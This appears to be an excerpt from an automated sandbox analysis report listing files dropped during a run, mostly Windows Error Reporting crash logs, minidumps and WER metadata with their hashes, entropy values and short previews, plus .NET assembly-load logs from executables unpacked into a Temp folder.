                                      SHA-256:0102B89BDB47D95A17DCEF4B9AF6FF18C1511792FD4579BBD9EE471C18018D50
                                      SHA-512:C0F15B45A410E5C1FA483C043602705793DD3674FAE3E13C9A803760E58E3AA87C185C6E058D04163066F8DD709F55A018D8FD2EAD7C267AABFE6C8F6713E646
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.9888165884278494
                                      Encrypted:false
                                      SSDEEP:96:w4FKEmD0bofes4hES7Rf/QXIDcQnc6rCcEhcw3rL+HbHg/1AnQECaVDPCoLnNfoG:Y0UfeW056rAjICB4HzuiFIZ24IO8q
                                      MD5:72C631849B05EFB3A62DA6B8325FC459
                                      SHA1:BE90B381AD63855AED43F0D133FA742F0E54163A
                                      SHA-256:4CD6E071FE6B37E8EAAE2CC8757ED3B675A74416766B3CD27C1D2A0F50F62E0D
                                      SHA-512:202FB7A3694A99F3A8BDE7BF51704E19F6264212634C7846ED6F9E12DEDD3790D23C49BC9E08F27912CD6699AC5AFE02D693FABB759A68AC89106EB3D1BACA8E
                                      Malicious:false
Preview (UTF-16 text decoded; truncated as in the original preview):
Version=1
EventType=APPCRASH
EventTime=133687042432345117
ReportType=2
Consent=1
ReportIdentifier=0720d01f-7fd7-4e57-88ae-ae8ae5abd9b5
IntegratorReportIdentifier=ce255432-de12-4285-8956-538f8cb52a39
Wow64Host=34404
Wow64Guest=332
NsAppName=Mon1785436ae78.exe
AppSessionGuid=00001f8c-0001-0014-44b8-cd17a8f3da01
TargetAppId=W:00063f2df68749c105e22a198ddadfa87d3c0000ffff!00007b723301027c1c6979561bc60b2be47d481c7c17!Mon1785436ae78.exe
TargetAppVer=2021//10//04:21:43:39!0!Mon1785436ae78.e
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.982214711035863
                                      Encrypted:false
                                      SSDEEP:96:A/5xD0bofss4hES7Rf/QXIDcQnc6rCcEhcw3rL+HbHg/1AnQECaVDPCoLnNfoU+V:MF0UfsW056rAjICB4qzuiFIZ24IO8qz
                                      MD5:42A201BBC3BF5DBADE31D2E8E9015291
                                      SHA1:EF67224DD2135DEB81339A3878E5A300216165BD
                                      SHA-256:CBA664C01BD972AD0DABB8C3ED1549376976481FA606336838A8B6AEF5D7DA3B
                                      SHA-512:A174FC3278E80C84AA8246812EF49E9A5D4252E3E08A8715B21FB990D53A61F5059E25E41CF2A8DB3831F62D9656B899BE7F2ABC1D02AD99F0AA213270C0E408
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.9820049112336838
                                      Encrypted:false
                                      SSDEEP:96:qkJD0bofws4hES7Rf/QXIDcQnc6rCcEhcw3rL+HbHg/1AnQECaVDPCoLnNfoU+jF:T0UfwW056rAjICB4qzuiFIZ24IO8q
                                      MD5:ED2B4179207A622F422E0DE10BAF716A
                                      SHA1:8F7008817BF0999C680E18302644A6CF33804B2B
                                      SHA-256:B45DA1FCA3A7968A96DB093A4F5B89A436F9C539EC4679E07366B1BCFB961D2F
                                      SHA-512:4D85E6598B4A5B7EA360C98CFF8387BDB05A150A99620DBFC2DD70C8F1129DB62A36096A2855D9C3CD445AE4192676E97F148FFCAAC87D0DD7D0569BA52D488E
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.9820053669626612
                                      Encrypted:false
                                      SSDEEP:96:Mfp6vD0bof3s4hES7Rf/QXIDcQnc6rCcEhcw3rL+HbHg/1AnQECaVDPCoLnNfoUa:UQL0Uf3W056rAjICB4qzuiF+Z24IO8q
                                      MD5:B767C974F0A75C19D2574BC8E5D71FC8
                                      SHA1:2C16B903CFAC497F51B6734AD014D446C0799D74
                                      SHA-256:CC1A4766DE6567127301E1F868E350AE4591820127FBBD1B47CBE9FD847E9AF9
                                      SHA-512:52104555FAA93D7567BABA1D687B5B4AB6E2B394AADB1C6262EDE76EF6898ABF5ECD38F4BAD741DF406CE77BC82A0980478FD631DC60F7E9E632472B06C36223
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.5855497280399842
                                      Encrypted:false
                                      SSDEEP:96:6aFX0ovF2FFsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAaf/VXTu:RJUFFk0WbkQzuiFIZ24IO8bL
                                      MD5:F91B2C8A0DB1A3DB4EE893FF78275CBC
                                      SHA1:2BD433AEFF1BAFF988988FB1B41C5846304333CF
                                      SHA-256:2A12737D06E8006CEC7D68E4FE66C5CF2E86724577D6508755FEAEF41447F81A
                                      SHA-512:6D4FADDF7FC17B0E8947046405CC0A5EF249FFAAB466AB41F6A9AE78BE865C0DBA1FA20992F9CD1FDC9DBAF0DC5AF07182D2C0467949862B1E390000333AFB6B
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.0291643952725706
                                      Encrypted:false
                                      SSDEEP:192:f74Mpdxc03XhYCejICB95zuiFIZ24IO8Kd:D4MpdxX3XhYCejIWzuiFIY4IO8Kd
                                      MD5:5A8B32B72BF815E72C3CC95CE4BD960F
                                      SHA1:68A15DB5B3C3DA90863CEDAA681B5442D4164ED2
                                      SHA-256:A52CD7D31A3D7E01FFF73BC9604CEB0CA735F85507B2D35CC9C5D05AFA54AC75
                                      SHA-512:BAC9332BA5BCF927D9039A0CEA13000544C4F7B4BB09C8013CAB94B06130FE35494FBAAB75FFE9DC8957B57E9786882867EF1DF5BD3AF4336B4FFA28EFB24632
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Wed Aug 21 08:57:07 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):48560
                                      Entropy (8bit):2.366950899746436
                                      Encrypted:false
                                      SSDEEP:384:tPr+KU0ir4eAL3ejC0xy6ua8QuOzjmXvGSvRcb3/h/vrnxpXUAzkKQdN2c:8KVeAzejbxy65r35vrxpXpzkKQdNf
                                      MD5:59D1C14D643DD4C6CC9997C927D2DCEC
                                      SHA1:FDC251B1C6772AFC58AC39F1F2EB616371178BC3
                                      SHA-256:FB2CF081B9400DDBACC4C6AB7913F0C48C617D394763E553A3B76B95EA99CCBC
                                      SHA-512:7D9757A42A68B107A1ECC6275B4023E38D818705B9662B190921A466E07212E47BF380CFB54317CF1420DC0570DB2E2E5C1778FC72EA54AEC7227A4E508971C7
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8318
                                      Entropy (8bit):3.692558028353917
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJA465bJot6Ymm6vOgmf0GfprT89bXssfw9m:R6lXJP6546Y36vOgmf0GGX/fX
                                      MD5:7BD97E7F2225B273066B96BAD7B7BD2E
                                      SHA1:FD41BF24E54968C8DAD8050B13639DF2A2DA3D7E
                                      SHA-256:A39D5ECF20489A6369305257531ACFB196356FCE0B3E39FC6F6B08F3B1688234
                                      SHA-512:8ECE7A3D31FB2C85C0444EA8A4957DF3BD608AD2C6FA719E44ADC3C589D60660A6409AD888F12CAA6F990390578543533F2B093B392EC3EE9AA80C517935773C
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4605
                                      Entropy (8bit):4.4589916049360445
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsQtJg77aI90XWpW8VYDYm8M4JaIacIiFi+q88ILIfTzNQu6Wd:uIjfQHI7Sm7VzJyPzNQu6Wd
                                      MD5:98F055181D9AD53249B3685A04A8A249
                                      SHA1:40B67F9EB8F9F14E6D86269602BF6848AF05DABE
                                      SHA-256:B1783A87A3A32A7705B6C632CB298FC30DA34F53AE79EF05BFA737DC7FF3CD47
                                      SHA-512:EF3596B5DFCA5A831214A5FB2EF7C2C4FADC9F661D4F4DFCECA1285E16E2FE4A1A3A148DFDF646A8B3CD500AB230008A84A49EAA1317DC33E29EC908F730F1C6
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):6284
                                      Entropy (8bit):3.697067739092112
                                      Encrypted:false
                                      SSDEEP:96:RSIU6o7wVetbObM68UYR+V0wH5aMeUqx89bTAsfqrRm:R6l7wVeJCM68UYU3px489bTAsf2Rm
                                      MD5:DCE5E2FBCE73431CE785345773EC037C
                                      SHA1:E6FAF924821CB0AF8706D38ACC058EC1EC4370CB
                                      SHA-256:D4C17AE3755839DB474DECA82553863E3B414A15981B9CBA79C864B515ED3934
                                      SHA-512:A84090C2EFB2D2D30F3506D6A713869C3CA7AF73338DC93EA68D3759B204E3613B6937621D8B318E4CFC9167E89BE5056A342F909BA24389919CF7D10F2DB5D9
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4598
                                      Entropy (8bit):4.446248502287888
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsQtJg77aI90XWpW8VY5vYm8M4JTHFtyj+q875eQe31N9d:uIjfQHI7Sm7VtJGlb31N9d
                                      MD5:A41DEAB351E79F364608A8CAAB9ECE16
                                      SHA1:BBC5049175C592E42EA1809740CE445661012865
                                      SHA-256:55314F63136CACFA93807CEF10B06BB3E7152E2CCE3047CEACCEF2DF66C7ED8F
                                      SHA-512:1DB0A614744B1973C9FC501AC4B803DE16D3E8D86B51B2E49F824512FDE9C701E79432730547BBFA1CE8F633EB2A76836180E623FCC709A777496F46F405C23C
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Wed Aug 21 08:57:17 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):77338
                                      Entropy (8bit):2.3739588497132575
                                      Encrypted:false
                                      SSDEEP:384:0wEa5CS2KL3g3X06escsLBWSMjfa7M99ZI98rwcq:0Ej2Kzg3X0vqLBWSqSw9G
                                      MD5:F3DCB79259050EB1D55A8FBC29D6DA88
                                      SHA1:04C3C5DF1F9F42575F2A0806EDEC21717F11A780
                                      SHA-256:6630AD1C5D775A8A326B5C38C78ED89DD9A9AF283FACE991A822F6DBF35EAA5C
                                      SHA-512:57D5720EBC02FDB00D0D07C3F69B0C6A57AF9C12B339D654AFD31823305893171FAF4162F62E1C252DB887B189CA240D59A0B266B334FE11195DED303E6FC984
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8318
                                      Entropy (8bit):3.6971367970579476
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJtW6IN16Y196aggmfKXpBu89bhKsfbQxrm:R6lXJs6IN16Y/6aggmfKvhpfbQg
                                      MD5:BA8F009A0E7D55C513A3B5B32699F007
                                      SHA1:21E91FC2EB97C410D94F11DFAA87162A64941173
                                      SHA-256:E7328306A4AC43F6195F3A2D6DA31175D86F7DAA66CF6C093422A783B90EE1A9
                                      SHA-512:7B2CC8B5BCF7E97EBE0CE5E674E3222641B182DF39569D31EC7F59A7F7DFCB010AADC71D49728992CC319A9E8564195DDF0275033E140665A5F20DF4E146863B
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4607
                                      Entropy (8bit):4.467411103789839
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsQtJg77aI90XWpW8VYCYm8M4JIs8N6Fmx+q8M7Pl1ABHHd:uIjfQHI7Sm7VWJazxX1OHHd
                                      MD5:513B56A2A5BC20C727466C8706778DD0
                                      SHA1:6FE4B54233C697E4B97215807AF0B41218574257
                                      SHA-256:8EA47C26545785DDB32E3983D3B0FC0F4C16E0D5BA30DAA320C987F93703CB64
                                      SHA-512:FE2C39883FE29ED56915A263CDBEA7B8A07E96C77C45B400A2A6817F8C13A53928F719F4B254323CA903C001E206D03A171AAA9EF6BB855CC4DB25A5DC1C0D6A
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Wed Aug 21 08:57:19 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):82934
                                      Entropy (8bit):2.312529261747667
                                      Encrypted:false
                                      SSDEEP:384:MUbCSyjhOpvL3geam6ECsK1wNLBWSMjfa7M29oIk+2rNRlE4:MU+ROpvzgeamnCNULBWSqSL9kPl
                                      MD5:D7172FD3D0B77F52B39D5CE120367F61
                                      SHA1:541F692523AD8FEBEF28AD0E2C66C7223AB0E0B2
                                      SHA-256:FA881E239FF572C467C3E09E583EBF6E274A37596330EE3B451AC66D27901357
                                      SHA-512:410BE99E46AB59A389C64788F5ECF17763590EFD2DCA988C9AD5164AC59977945F15F12A1F7E0B99851A81E51565F646AB8D2E0D0107DCD1645963CBAF96B3DF
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8318
                                      Entropy (8bit):3.695738121153532
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJtV6IXp1B6Y1I6aggmfKXpBB89b/KsfqG1m:R6lXJf6I51B6Yq6aggmfKG/pfqV
                                      MD5:D70F0020ABBD8A4771B168FF9E35B30C
                                      SHA1:AE6D2101446CB55F7EA48ADC3776F790B6BF420B
                                      SHA-256:1552656BD470E61586127847D312DCA005B7902807C5566B098972995662E59B
                                      SHA-512:C038797718305628A11CCD0BE97A7F57E51D35DC349B6A796D5A6CC56161958E6A48E560431BB2A5DD5DAE2008C69A70FA4E4357718AB4D4BD701A961458736E
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4607
                                      Entropy (8bit):4.4694407185226925
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsAJg77aI90XWpW8VY7Ym8M4JIs8N6Fmz+q8M7Pl1ABHHd:uIjfGI7Sm7V/JafzX1OHHd
                                      MD5:A942C56B799208EC7D604536D1F798A0
                                      SHA1:F32EAEE7ABBFED78B39A9AE3FFD1CAE0CE4E662B
                                      SHA-256:47BEF3AF0ACD839E2C13EB7E5F6AEE1FAA6EE86C809757A4668C5AAA8C93B0B6
                                      SHA-512:B710175806980FDD957A575792A4284E1BBEDBE2C26116E81CEFB9A4A7FA871720E957414392CE51F4F90102C866D81523979B10E9FFB1040B6D85B5A0F1C7DA
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Wed Aug 21 08:57:21 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):96214
                                      Entropy (8bit):2.374965459724901
                                      Encrypted:false
                                      SSDEEP:384:PydiilO9jL3gBPm6HsDBbPMesDUcMyprEWSMjfa7Mf9nIVSS8aYyDo8BCZoiJGMl:PKBO9jzgBPm20BTM13DEWSqSi9iiJGn
                                      MD5:32F2CD22C1CA0124912B6FD44518BD1B
                                      SHA1:859A77B50C0B6868B35ECBB66DD9375BC2D1E0CC
                                      SHA-256:06C12DCA1C2025EDC23F0055F8F6AD290ED41B99E9AEA8C33691C34E7AB3A56F
                                      SHA-512:199205452094184D1CF1A099D67A9F0D5AD22A5EF1B1C18E28F33BFE18243DAEA2466CA68AE485849C6D5BE5F7D797992C3283E701E96675B2A8FCC36B9DB0A1
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8318
                                      Entropy (8bit):3.6944309875781562
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJtL67T6Y1+6aggmfKXpBu89b0Ksf88m:R6lXJh6v6Y86aggmfKv0pf+
                                      MD5:3DE69C39D729CD396209D60420A6F91A
                                      SHA1:0CB858C1771AEB3F98C7F678AB88E28CBC3E9D42
                                      SHA-256:4290728E6BB77338F711C76FA5489C5000AC9B3D7ED06470D13B8CB48ABBA77B
                                      SHA-512:7ACF959AA786C7579ED3BFA2C4C98DC7D2CC1D1939F3BE247D879E4A5E1D4E79266E44A31E7207CF9F1060E3F94CA81D225A70B9CCB689F68BAB96E22611AE73
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.6.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4607
                                      Entropy (8bit):4.465766562745566
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsAJg77aI90XWpW8VY3Ym8M4JIs8N6FK+q8M7Pl1ABHHd:uIjfGI7Sm7VbJa5X1OHHd
                                      MD5:5B6CD11868B6EDC753B56176227F9994
                                      SHA1:3A644EDD0CA71751C0555D24EE9C4B5F94AE36B7
                                      SHA-256:54A6D697CFDB3FCAA859253F7802F46F49D5EDD0981F5276A3B2E765D790624C
                                      SHA-512:802F784A4AAA9CB605867E76954D2B7F8DF0ECF61A433639465DD18E46DFC67B4AA4CBFFE29A61D4C58C7B177D56F3B1BF971270560A1A4373E3745A56B427EB
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="465120" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Wed Aug 21 08:57:23 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):98068
                                      Entropy (8bit):2.2413814904543097
                                      Encrypted:false
                                      SSDEEP:384:TI/wmHPGnvL3gxdWta33xEWSMjfa3MQ9VhsU5EI4zgk2fEb+:cYkGnvzgxMt2BEWSqSp9VhTG728y
                                      MD5:8B6651545403F5C27B812C130D5819DA
                                      SHA1:41E6AC821A320E15D8D5D6E4743E65809A4ECE39
                                      SHA-256:5F2BB8635F7D6BA66FFF902F2DD529910246E4C46C44F2F601B9838CA1E225C0
                                      SHA-512:6EB8ACEAB52CBE7DAC03D03C408CB6A0EC7D66109BB3883FF4EDEFF76254FBDD70661E59CFF0E4E49E3426F0B265E2274E7C10241E630C717C030D485BE976FF
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8320
                                      Entropy (8bit):3.693131110688215
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJtS6Kte6Y1U6aggmfKXpB189bmKsfCim:R6lXJ46x6Y26aggmfK6mpfO
                                      MD5:9AF27030D32EA09AB85B92DEA57E7695
                                      SHA1:11BD004B671527E68707AC7526F0446264AFBCCA
                                      SHA-256:468CE633CF0435CFCCDED7DAEE0FC7DADD76F880BE059EAF1C0B580C6B2688C1
                                      SHA-512:3B032F2FAD9320CDBE7B08C6171A90B13CC845658EC39A7701D22084BAB33F88E8671B28D23129004029B39F1D43F1C5611DBFF958CA7FAF4BD6D027D0DD7B67
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.6.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4607
                                      Entropy (8bit):4.467962957741811
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsAJg77aI90XWpW8VYsYm8M4JIs8N6Fr6+q8M7Pl1ABHHd:uIjfGI7Sm7V4Ja66X1OHHd
                                      MD5:A18E772A9669D22FBE9F12DDB38AEC7F
                                      SHA1:639693B7544AB8C8CB7F01FF95981F5F33A4CCD2
                                      SHA-256:48C5FE8BA39888DB626F47785CEFB927F26DEDEBF8A3A5FBA8EE39331CAC4FFA
                                      SHA-512:6769FDE07DCBB88AFCD4C52D25F0F5564FBAF369F927DDE6621AA9EB1000EA8816807CEE01A60AEBBC5F20DD730FC1A7CB0E057FCEB558684174E1E5049A08A2
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="465120" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):700
                                      Entropy (8bit):5.353797980319479
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat/DLI4M/DLI4M0kvoDLI4MWuCv:ML9E4KlKDE4KhKiKhgLE4qE4jE4Ks
                                      MD5:0787FE1F04EBDC86F7B7437F788F7785
                                      SHA1:9D584F7D0AF6008786AD80652E99C824C488EA36
                                      SHA-256:588BDC432DCE526159EDB6EE18C6CB87B7C080112C75D167E9B15D26EE03D922
                                      SHA-512:7C5C75832E1BF28026F4689028CD89D288DE4CDBB26554A80A8EBE34EE5561D63A7EC6EBB4BD58EB5EE1E9E1FC0FDBAE57D25822048F42A9BF8A504F721E6397
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                      Process:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):700
                                      Entropy (8bit):5.353797980319479
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat/DLI4M/DLI4M0kvoDLI4MWuCv:ML9E4KlKDE4KhKiKhgLE4qE4jE4Ks
                                      MD5:0787FE1F04EBDC86F7B7437F788F7785
                                      SHA1:9D584F7D0AF6008786AD80652E99C824C488EA36
                                      SHA-256:588BDC432DCE526159EDB6EE18C6CB87B7C080112C75D167E9B15D26EE03D922
                                      SHA-512:7C5C75832E1BF28026F4689028CD89D288DE4CDBB26554A80A8EBE34EE5561D63A7EC6EBB4BD58EB5EE1E9E1FC0FDBAE57D25822048F42A9BF8A504F721E6397
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
